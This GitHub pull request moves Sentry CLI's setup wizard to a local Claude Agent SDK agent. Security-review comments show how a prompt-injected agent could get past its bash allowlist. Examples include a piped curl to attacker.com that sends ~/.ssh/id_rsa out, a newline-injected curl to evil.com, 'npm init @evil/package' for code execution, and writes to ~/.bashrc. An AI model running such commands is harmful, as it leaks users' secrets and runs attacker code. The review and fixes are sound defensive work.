feat(init): run the setup agent locally via the Claude Agent SDK by betegon · Pull Request #1143 · getsentry/cli

betegon · 2026-06-26T08:05:13Z

Summary

Replaces the remote Mastra workflow (suspend/resume over the network) with a
local coding agent powered by @anthropic-ai/claude-agent-sdk. The agent
inspects the project, fetches Sentry docs on demand, installs the SDK, and
applies changes locally. We keep all the pre-agent work (preflight, org/project
resolution, project creation, feature selection, UI) and drop the suspend/resume
protocol and @mastra/client-js.

Inspired by PostHog's wizard, which runs the same SDK locally.

Changes

New local agent runner (src/lib/init/agent/): drives query(), gates tools via canUseTool (.env block + bash allowlist), isolates from the user's Claude settings (settingSources: []).
Model traffic routes through the Sentry init gateway -> Vercel AI Gateway (ANTHROPIC_BASE_URL). SENTRY_INIT_ANTHROPIC_API_KEY is a BYO-key/self-host/dev escape hatch straight to Anthropic.
Docs are local and iterative: get_docs_by_keywords walks docs.sentry.io/doctree.json and fetches .md pages — the agent calls it as often as it needs (src/lib/init/docs/). No remote docs service.
Deterministic Xcode/pbxproj transforms (sentry-cocoa SPM, React Native build phases) ship as in-process tools the agent invokes when it detects the platform (src/lib/init/agent/framework/).
wizard-runner rewritten to the local flow; removed init-service-auth and the old suspend/resume test.

Distribution / size

The SDK's JS is bundled at build time, but its per-platform native runtime is
not — the CLI stays fully bundled with zero runtime deps (check:no-deps). On
first init the native runtime is downloaded and cached under
~/.sentry/agent/<version>/<platform>/ (integrity-checked) and reused; running
from source uses the SDK's own binary and skips the download. So the shipped
artifacts barely grow; the heavy part is a one-time, per-machine, cached fetch.
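
The lookup order described above could be sketched as follows. This is a minimal illustration, not the code in this PR: `cachedRuntimePath`, `chooseRuntime`, and the `exists` callback are hypothetical names, and placing the `claude` file directly under the `<platform>` directory is an assumption.

```typescript
import * as os from "node:os";
import * as path from "node:path";

type RuntimeSource =
  | { kind: "sdk-binary"; path: string } // running from source: SDK's own binary
  | { kind: "cache-hit"; path: string } // already downloaded on this machine
  | { kind: "download"; path: string }; // first init: fetch, verify, then cache here

/** Assumed layout: ~/.sentry/agent/<version>/<platform>/claude */
function cachedRuntimePath(
  version: string,
  platform: string,
  home: string = os.homedir(),
): string {
  return path.join(home, ".sentry", "agent", version, platform, "claude");
}

/** Hypothetical decision helper; `exists` is injected so the logic stays testable. */
function chooseRuntime(opts: {
  version: string;
  platform: string;
  home?: string;
  sdkBinary?: string;
  exists: (p: string) => boolean;
}): RuntimeSource {
  // Prefer the SDK's own binary when node_modules is present.
  if (opts.sdkBinary && opts.exists(opts.sdkBinary)) {
    return { kind: "sdk-binary", path: opts.sdkBinary };
  }
  const cached = cachedRuntimePath(opts.version, opts.platform, opts.home);
  return opts.exists(cached)
    ? { kind: "cache-hit", path: cached }
    : { kind: "download", path: cached };
}
```

Keying the cache by version and platform means an SDK upgrade triggers one fresh download instead of reusing a stale runtime.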

Measured on darwin-arm64 (other platforms similar):

| Artifact | Before (main) | After | Δ |
|---|---|---|---|
| Single binary (SEA) | 101 MB | 102 MB | +~1 MB |
| npm package, packed | 2.5 MB | 2.6 MB | +~0.1 MB |
| npm package, unpacked | 9.3 MB | 9.6 MB | +~0.3 MB |
| Bundle `dist/index.cjs` | 4031 KB | 4382 KB | +~351 KB |
| Agent runtime (native `claude`) | n/a | ~62 MB download / ~210 MB on disk | not shipped; fetched once on first `init`, cached in `~/.sentry` |

(For comparison, embedding the native runtime into the binary instead would take it to ~312 MB per platform, ~3x — which is why we download-and-cache.)

Test plan

pnpm typecheck, pnpm lint, pnpm check:deps, vitest run test/lib/init (376 + new agent/docs tests green).
Ran sentry init on 19 framework test projects (JS, Python, Cloudflare, native iOS, monorepos, large apps): 19/19 applied a working integration.
Runtime-verified data lands in Sentry: node-express (errors + traces) and flask (errors).
Verified from the compiled binary run outside any node_modules: first run downloads + caches the runtime (~/.sentry/agent/.../claude), subsequent runs reuse it.
Parity vs production (0.37.0 Mastra) on all 19: equivalent-or-better where prod succeeded; new also succeeded on 5 projects prod failed (monorepos it refused, a timeout, a prod bug); new is ~2-3x faster. New also declares the SDK in Python manifests where prod left it out.

Known gaps (follow-ups)

Monorepo app-selection isn't gated: the agent auto-picks an app instead of requiring --app like prod. Usually it picks well, but for strapi it chose the framework's own package. Needs the deferred app-listing + --app gating.
Package-manager detection is non-deterministic (one nextjs run used npm in a bun project). Worth pinning.

Depends on getsentry/cli-init-api #182 (the gateway) being deployed. Merge/deploy the gateway first.

Replace the remote Mastra workflow (suspend/resume over the network) with a local coding agent powered by @anthropic-ai/claude-agent-sdk. The agent inspects the project, fetches Sentry docs on demand, and applies changes locally, so we no longer maintain a server-side workflow or the suspend/resume protocol.

- model traffic routes through the Sentry init gateway to the Vercel AI Gateway (ANTHROPIC_BASE_URL); a SENTRY_INIT_ANTHROPIC_API_KEY escape hatch allows BYO-key / self-host / dev runs straight to Anthropic
- docs are served by a local, iterative get_docs_by_keywords tool that walks docs.sentry.io's doctree.json and fetches .md pages (no remote docs service)
- deterministic Xcode/pbxproj transforms (sentry-cocoa SPM, React Native build phases) ship as in-process tools the agent calls when it detects the platform
- drop @mastra/client-js and init-service-auth; readiness now checks the gateway

Co-authored-by: Cursor <cursoragent@cursor.com>

Unit tests for the local-agent tool gate (.env block, bash allowlist, recursive-wizard guard) and the doctree lookup helpers (lib/feature path mapping, seed-page discovery, path normalization). Co-authored-by: Cursor <cursoragent@cursor.com>

github-actions · 2026-06-26T08:06:05Z

PR Preview Action v1.8.1
🚀 View preview at https://cli.sentry.dev/_preview/pr-1143/
Built to branch `gh-pages` at 2026-06-26 10:08 UTC. Preview will be ready when the GitHub Pages deployment is complete.

sentry-warden

Bash allowlist filter missing pipe and newline operators, enabling shell injection bypass

In src/lib/init/agent/permissions.ts, SHELL_OPERATOR_RE (/[;&\$()]/) omits |, >, <, and \n, so a prompt-injected command like npm run build | curl https://attacker.com -d @~/.ssh/id_rsa passes every guard (DANGEROUS_BASH_RE, SHELL_OPERATOR_RE, and the startsWith("npm run") prefix check) and executes as-is. Add |, >, <, and \n/\r to the operator regex.

Evidence

SHELL_OPERATOR_RE = /[;&\$()]/ in permissions.ts line 21 does not include |, >, <, or newline characters.
isAllowedBash('npm run build | curl https://evil.com -d @~/.ssh/id_rsa'): DANGEROUS_BASH_RE → false; SHELL_OPERATOR_RE.test(...) → false (no chars in [;&\$()]); startsWith('npm run') → true → allowed.
Newline injection also bypasses: 'npm install x\ncurl https://evil.com' starts with 'npm install' and contains no blocked characters.
The Bash tool is enabled in non-dryRun mode (runner.ts buildAllowedTools), and the agent reads user-controlled project files, making prompt injection a viable attack path.
A malicious repository file (e.g., a README or config) could inject an instruction causing the agent to issue a piped exfiltration command that the filter accepts.
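
The gap can be reproduced with the two character classes quoted in this finding. The sketch below is illustrative only: `ORIGINAL_RE` and `EXTENDED_RE` are stand-in names (the real constant is SHELL_OPERATOR_RE), and the attacker host is a placeholder.

```typescript
// Character class as quoted in the finding: no pipe, redirects, or line breaks.
const ORIGINAL_RE = /[;&\$()]/;
// Proposed class: adds |, <, >, \n and \r.
const EXTENDED_RE = /[;&|<>\$()\n\r]/;

/** Returns true when the command contains a character the given class rejects. */
function hasShellOperator(command: string, re: RegExp): boolean {
  return re.test(command);
}

// Placeholder payloads modelled on the examples in the finding.
const piped = "npm run build | curl https://attacker.example -d @~/.ssh/id_rsa";
const multiline = "npm install x\ncurl https://attacker.example";

console.log(hasShellOperator(piped, ORIGINAL_RE)); // false: slips through
console.log(hasShellOperator(piped, EXTENDED_RE)); // true: rejected
console.log(hasShellOperator(multiline, ORIGINAL_RE)); // false: slips through
console.log(hasShellOperator(multiline, EXTENDED_RE)); // true: rejected
```

A character denylist like this remains a fallback gate; it does not parse shell syntax, so it is only as complete as the list of characters it names.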

Identified by Warden security-review

The CLI ships fully bundled with zero runtime dependencies (npm package and single binary alike), so the Claude Agent SDK's per-platform native runtime (~62 MB download, ~210 MB on disk) can't ride along in node_modules. Download it on first `init` and cache it under ~/.sentry/agent/<version>/<platform>, then point the SDK at it via pathToClaudeCodeExecutable. Subsequent runs reuse the cache; running from source (node_modules present) uses the SDK's own binary and skips the download. Keeps @anthropic-ai/claude-agent-sdk and xcode as bundled devDependencies so the published package stays dependency-free (check:no-deps). Co-authored-by: Cursor <cursoragent@cursor.com>

Address PR review findings:

- Enable the Claude Agent SDK OS sandbox (filesystem allowWrite + network allowedDomains, failIfUnavailable:false) as the primary containment, mirroring PostHog's wizard. This restricts the agent's writes to the project + package caches and its egress to package registries, the model gateway, GitHub, and docs.sentry.io, which blocks exfiltration via piped shell commands.
- Block | < > and newlines in the bash allowlist as the fallback gate for hosts where the OS sandbox is unavailable.
- Use the realpath-based safePath() for the in-process Xcode tools (which write outside the sandbox) so symlinked paths can't escape the project root.
- Parse the URL pathname in normalizeDocPath instead of a startsWith(host) substring check (clears the CodeQL alert; behavior unchanged).

Co-authored-by: Cursor <cursoragent@cursor.com>
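
The difference between a host substring check and parsing the URL can be sketched as below. This is not the PR's normalizeDocPath; `docPathFromUrl` and `DOCS_HOST` are hypothetical names, and stripping trailing slashes is an assumption about the normalization.

```typescript
const DOCS_HOST = "docs.sentry.io";

/**
 * Hypothetical helper: returns the docs path for a URL or site-relative path,
 * or null when the input does not point at the docs host.
 */
function docPathFromUrl(input: string): string | null {
  let url: URL;
  try {
    // Relative inputs such as "/platforms/python" resolve against the docs host.
    url = new URL(input, `https://${DOCS_HOST}`);
  } catch {
    return null;
  }
  // Compare the parsed hostname exactly instead of testing a string prefix.
  if (url.protocol !== "https:" || url.hostname !== DOCS_HOST) {
    return null;
  }
  // Assumed normalization: drop trailing slashes, keep "/" for the root.
  return url.pathname.replace(/\/+$/, "") || "/";
}
```

A prefix test such as `input.startsWith("https://docs.sentry.io")` would accept `https://docs.sentry.io.evil.example/x`, whereas the parsed hostname comparison rejects it.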

…turns

Per the Claude Agent SDK hosting guide:

- Point CLAUDE_CONFIG_DIR at our scratch dir and set CLAUDE_CODE_DISABLE_AUTO_MEMORY=1 so the spawned CLI doesn't read or write the user's ~/.claude (transcripts, global config) and doesn't auto-load their CLAUDE.md memory, which loads regardless of settingSources and is a prompt-injection vector.
- Set maxTurns (the SDK has no built-in wall-clock timeout) to bound a runaway session.

Co-authored-by: Cursor <cursoragent@cursor.com>

sentry-warden

"npm i" prefix allows npm init <package> to execute arbitrary code

The "npm i" entry in SAFE_BASH_PREFIXES is matched with String.prototype.startsWith, so npm init @evil/package passes every check (DANGEROUS_BASH_RE misses it, SHELL_OPERATOR_RE misses it, and "npm init …".startsWith("npm i") is true). npm init <package> downloads and immediately runs the package's create script, giving an adversarial LLM output or a prompt-injection a path to arbitrary code execution. Fix by adding a trailing space: change "npm i" to "npm i " (and likewise audit "npm install" → "npm install ", etc.).

Evidence

permissions.ts line 27: "npm i" is the entry in SAFE_BASH_PREFIXES.
isAllowedBash (line 101) uses normalized.startsWith(prefix), so "npm init @evil/pkg" satisfies the prefix for "npm i".
DANGEROUS_BASH_RE matches only rm -rf, git reset, etc. — npm init is not listed.
SHELL_OPERATOR_RE matches [;&|<>\$()\n\r]; npm init @evil/pkg contains none.
npm init <pkg> fetches and executes the package's initializer script (create-<pkg> on npm), i.e., arbitrary remote code execution.
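
The prefix collision and one possible fix can be sketched as follows. The prefix list is an illustrative subset, and `matchesNaive` / `matchesOnTokenBoundary` are hypothetical names, not functions from permissions.ts.

```typescript
// Illustrative subset; the real SAFE_BASH_PREFIXES list is longer.
const SAFE_PREFIXES = ["npm i", "npm install", "npm run"];

/** Plain startsWith, as described in the finding. */
function matchesNaive(command: string): boolean {
  return SAFE_PREFIXES.some((prefix) => command.startsWith(prefix));
}

/** Requires the prefix to end at a token boundary (end of string or a space). */
function matchesOnTokenBoundary(command: string): boolean {
  return SAFE_PREFIXES.some(
    (prefix) => command === prefix || command.startsWith(`${prefix} `),
  );
}

console.log(matchesNaive("npm init @evil/pkg")); // true: "npm init" starts with "npm i"
console.log(matchesOnTokenBoundary("npm init @evil/pkg")); // false
console.log(matchesOnTokenBoundary("npm i lodash")); // true
```

Compared with only appending a trailing space to each entry, the boundary check also keeps the bare command (`npm install` with no arguments) allowed.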

canUseTool Write/Edit handler allows writes to any path outside the project root

In src/lib/init/agent/permissions.ts, canUseInitAgentTool for Write/Edit only blocks .env file patterns but imposes no project-root restriction. On Linux hosts where the OS sandbox is unavailable (failIfUnavailable: false), a prompt-injected agent can write to any user-writable path (e.g. ~/.bashrc, ~/.ssh/config). The sandbox is described as the primary containment with canUseTool as belt-and-suspenders, but the belt-and-suspenders doesn't cover path scope for Write/Edit.

Evidence

sandbox.ts sets failIfUnavailable: false, explicitly allowing graceful degradation on Linux without bubblewrap.
sandbox.ts comment: "This is the primary defense … canUseTool and safePath are belt-and-suspenders."
permissions.ts canUseInitAgentTool for 'Write' and 'Edit': checks isEnvPath(inputPath(input)) only; no check that the path is under workingDirectory.
runner.ts line ~231: canUseTool callback calls canUseInitAgentTool(toolName, input) but does not pass workingDirectory into it, so the permission function has no project-root context to enforce.
By contrast, the MCP tools (applyIosSpmTool, patchRnXcodeTool) properly use safePath(workingDirectory, relativePath) to enforce project root—same guard is absent for the built-in Write/Edit tools.
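
A project-root check for Write/Edit could look roughly like the sketch below. It is a lexical check only, under the assumption of POSIX-style paths: `isInsideRoot` is a hypothetical name, and unlike the realpath-based safePath mentioned in this PR it does not resolve symlinks.

```typescript
import * as path from "node:path";

/**
 * Hypothetical helper: true when `target` (absolute, or relative to `root`)
 * resolves to `root` itself or a path beneath it. Lexical only: symlinks are
 * not followed, so a realpath step would still be needed for full containment.
 */
function isInsideRoot(root: string, target: string): boolean {
  const resolvedRoot = path.resolve(root);
  const resolvedTarget = path.resolve(resolvedRoot, target);
  const rel = path.relative(resolvedRoot, resolvedTarget);
  if (path.isAbsolute(rel)) {
    return false; // e.g. a different drive on Windows
  }
  // Reject ".." and "../x", but allow names that merely begin with "..".
  return rel !== ".." && !rel.startsWith(`..${path.sep}`);
}
```

Passing workingDirectory into the permission callback and calling a check like this before the .env test would give Write/Edit the same scope as the in-process Xcode tools.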

Identified by Warden find-bugs

…ecksum

Address follow-up review findings:

- Block .envrc (direnv) in the Read/Write/Edit and Grep env-file guard, not just .env / .env.*.
- Make the Grep guard glob-aware so patterns like **/.env* or *.env can't surface env-file contents (the previous literal-path check missed them).
- Refuse to execute the downloaded agent runtime unless it verifies against the registry's sha512 integrity (falling back to the sha1 shasum), instead of silently skipping verification when integrity was absent.

Co-authored-by: Cursor <cursoragent@cursor.com>
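
One way to make an env-file guard glob-aware is to test the pattern's last segment against representative env-file names. The sketch below is an assumption about the approach, not the code in permissions.ts: all names are hypothetical, only `*` and `?` are treated as wildcards, and it is deliberately conservative (a bare `*` is denied because it could match `.env`).

```typescript
// Representative names the guard must never expose.
const SAMPLE_ENV_NAMES = [".env", ".env.local", ".envrc"];

/** Literal check: .env, .env.<anything>, and direnv's .envrc. */
function isEnvFileName(name: string): boolean {
  return name === ".env" || name.startsWith(".env.") || name === ".envrc";
}

/** Converts one glob segment to a RegExp; only `*` and `?` act as wildcards. */
function globSegmentToRegExp(segment: string): RegExp {
  const escaped = segment.replace(/[.+^${}()|[\]\\]/g, "\\$&");
  const body = escaped.replace(/\*+/g, ".*").replace(/\?/g, ".");
  return new RegExp(`^${body}$`);
}

/** True when a literal path or a glob could surface an env file. */
function touchesEnvFile(pathOrGlob: string): boolean {
  const segment = pathOrGlob.split(/[\\/]/).pop() ?? "";
  if (isEnvFileName(segment)) {
    return true;
  }
  const re = globSegmentToRegExp(segment);
  return SAMPLE_ENV_NAMES.some((name) => re.test(name));
}

console.log(touchesEnvFile("**/.env*")); // true
console.log(touchesEnvFile("*.env")); // true
console.log(touchesEnvFile("src/index.ts")); // false
```

Braces and bracket classes are treated as literal characters here, so a production guard would need either a real glob matcher or a stricter default for patterns it cannot interpret.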

betegon · 2026-06-26T11:00:19Z

Triaged the latest review findings:

.envrc not blocked and Grep glob/include .env bypass (permissions.ts) — fixed in dad734c: the env-file guard now also blocks .envrc (direnv) and is glob-aware, so **/.env* / *.env patterns are denied too. Added tests.
Missing integrity skips runtime verification (runtime.ts) — fixed in dad734c: we now refuse to execute the downloaded agent runtime unless it verifies against the registry's sha512 integrity (falling back to the sha1 shasum), instead of silently skipping when integrity was absent.
Sentry token in the agent subprocess env (reachable by install lifecycle scripts) — accepted with mitigation. The token must live in the subprocess env for the SDK to authenticate model calls to the gateway; there is no out-of-band channel (this is the same pattern Claude Code and PostHog's wizard use). Exfiltration is constrained by the OS sandbox's network.allowedDomains egress allowlist, and the subprocess is isolated from the user's ~/.claude via CLAUDE_CONFIG_DIR + CLAUDE_CODE_DISABLE_AUTO_MEMORY. Residual risk acknowledged.

Resolving these threads.
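
The fail-closed verification described in the second item can be sketched as follows, assuming the npm registry's usual `dist` fields (`integrity` as `sha512-<base64>`, `shasum` as hex sha1). `DistInfo` and `verifyDownload` are hypothetical names, and the sketch handles a single sha512 entry rather than a multi-hash integrity string.

```typescript
import { createHash } from "node:crypto";

/** Subset of the registry's dist metadata used for verification. */
interface DistInfo {
  integrity?: string; // e.g. "sha512-<base64 digest>"
  shasum?: string; // hex sha1 digest
}

/** Returns true only when the bytes match a checksum; no checksum means refuse. */
function verifyDownload(data: Uint8Array, dist: DistInfo): boolean {
  const integrity = dist.integrity;
  if (integrity && integrity.startsWith("sha512-")) {
    const expected = integrity.slice("sha512-".length);
    const actual = createHash("sha512").update(data).digest("base64");
    return actual === expected;
  }
  if (dist.shasum) {
    const actual = createHash("sha1").update(data).digest("hex");
    return actual === dist.shasum.toLowerCase();
  }
  // Fail closed: never execute a runtime that could not be verified.
  return false;
}
```

The final `return false` is the behavioral change: absent metadata is treated as a verification failure rather than a reason to skip the check.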

betegon and others added 2 commits June 26, 2026 10:03

github-advanced-security AI found potential problems Jun 26, 2026

Comment thread src/lib/init/docs/fetcher.ts Fixed